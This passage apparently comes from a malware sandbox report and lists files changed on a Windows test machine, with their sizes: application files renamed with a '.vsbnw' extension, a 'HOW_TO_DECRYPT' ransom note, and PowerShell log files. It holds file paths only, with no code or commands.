        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_FgAAABYAAAA0.vsbnw

          Filesize

          1KB

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          1KB

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main.css.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_NAAAADQAAAA0.vsbnw

          Filesize

          802B

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          2KB

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_JgAAACYAAAA0.vsbnw

          Filesize

          2KB

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          289B

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AgAAAAIAAAA0.vsbnw

          Filesize

          1003B

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_CgAAAAoAAAA0.vsbnw

          Filesize

          1KB

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_OAAAADgAAAA0.vsbnw

          Filesize

          2KB

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\dd_arrow_small2x.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          385B

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\ui-strings.js.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          840B

        • C:\Program Files\Java\jre-1.8\lib\images\cursors\invalid32x32.gif.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_DgAAAA4AAAA0.vsbnw

          Filesize

          153B

        • C:\Program Files\Microsoft Office\root\Office16\1033\POWERPNT_F_COL.HXK.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_JAAAACQAAAA0.vsbnw

          Filesize

          114B

        • C:\Program Files\Microsoft Office\root\Office16\1033\POWERPNT_K_COL.HXK.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_JAAAACQAAAA0.vsbnw

          Filesize

          113B

        • C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          604KB

        • C:\Program Files\yxjL_HOW_TO_DECRYPT.txt

          Filesize

          1KB

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

          Filesize

          2KB

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hnl3kpnt.2ll.ps1

          Filesize

          60B
